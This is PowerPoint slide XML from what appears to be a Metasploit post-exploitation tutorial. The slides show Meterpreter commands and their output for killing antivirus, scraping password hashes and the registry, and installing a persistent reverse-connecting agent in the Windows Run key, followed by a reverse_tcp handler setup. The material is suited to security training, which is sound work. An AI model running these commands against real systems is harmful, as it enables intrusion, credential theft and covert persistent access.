              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7896A7C-BD27-A0EA-6CE1-F7805F3215CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606379" y="5107815"/>
            <a:ext cx="6664004" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>killav</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing Antivirus services on the target...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing off antidown.exe...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Killing off antidown.exe...</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173697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1346156" y="4741276"/>
            <a:ext cx="10221004" cy="1940494"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3073CE9-D070-BCD2-7F89-F6269D792881}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346156" y="1366967"/>
            <a:ext cx="9461812" cy="1774117"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A966C0-F1F0-C962-DA9A-7036684722F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797142" y="520979"/>
            <a:ext cx="2303708" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>12. Scarping System</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1C57C24-AD6B-6991-3D7F-1F85ADABAF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870808" y="1447459"/>
            <a:ext cx="5554726" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>run scraper</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] New session on 192.168.1.1:1095...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Gathering basic system information...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Dumping password hashes...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Obtaining the entire registry...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Exporting HKCU</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Downloading HKCU (C:\WINDOWS\TEMP\Vcfuyfm.reg)</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A246210B-3C5C-FCBF-2333-F9A1431CA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797142" y="3204208"/>
            <a:ext cx="1768433" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistence</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD3B9C1E-2E24-A19B-AC9E-BCA6950041B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1823929" y="812478"/>
            <a:ext cx="11110018" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>This Script enumerates just about everything you could ever want from a system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>It will grab the usernames and passwords, download the entire registry, dump password hashes</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B4AAFB-A730-4C5E-7577-5A916B9C4AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700015" y="3443818"/>
            <a:ext cx="8542018" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Persistence script allows you to inject a Meterpreter agent to ensure that Meterpreter is running even after</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> the target system reboots If this is a reverse connection</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B6EA56F-2DE9-BAA5-ABEE-F3D378CD9606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240118" y="3953328"/>
            <a:ext cx="11315700" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> : We run persistence and tell Windows to auto start the agent at boot time (-X), wait 50 seconds (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> 50) before connection retries,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>run o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>port 443 (-p 443), and connect to IP 192.168.33.129. We then establish a listener for the agent at X with use multi/handler, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>and after setting a couple of options and running exploit</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE1B6B3-EEA8-91B7-7405-E060CBC5E42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1384032" y="4823162"/>
            <a:ext cx="10400604" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run persistence -X -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 50 -p 443 -r 192.168.33.129</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=true)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Persistent agent script is 316384 bytes long</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Agent executed with PID 3160</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xEYnaHedooc</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xEYnaHedooc</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166334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1140416" y="1140826"/>
            <a:ext cx="10221004" cy="4882784"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A246210B-3C5C-FCBF-2333-F9A1431CA660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797142" y="573052"/>
            <a:ext cx="1768433" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Persistence</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE1B6B3-EEA8-91B7-7405-E060CBC5E42B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2224692" y="2481791"/>
            <a:ext cx="532646" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>fggh</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA635C4-A70A-C143-5521-9E72C40F04D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1242060" y="1279505"/>
            <a:ext cx="9743373" cy="4185761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>meterpreter &gt; run persistence -X -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 50 -p 443 -r 192.168.33.129</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=true)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Persistent agent script is 316384 bytes long</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Agent executed with PID 3160</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\restart</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\restart</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&gt; use multi/handler</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exploit(handler) &gt; set payload windows/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payload =&gt; windows/meterpreter/</a:t>
